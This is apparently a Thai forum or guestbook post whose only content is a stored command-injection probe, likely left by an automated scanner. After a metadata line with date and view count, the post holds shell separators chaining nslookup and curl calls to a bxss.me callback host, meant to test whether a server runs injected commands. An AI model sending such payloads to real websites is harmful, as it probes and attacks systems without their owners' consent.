1

โดย : วันที่ : 20/01/2567 เวลา : 23:01 ดูไปแล้ว : 3 ครั้ง
;(nslookup -q=cname hitaruhygjvaf90527.bxss.me||curl hitaruhygjvaf90527.bxss.me)|(nslookup -q=cname hitaruhygjvaf90527.bxss.me||curl hitaruhygjvaf90527.bxss.me)&(nslookup -q=cname hitaruhygjvaf90527.bxss.me||curl hitaruhygjvaf90527.bxss.me)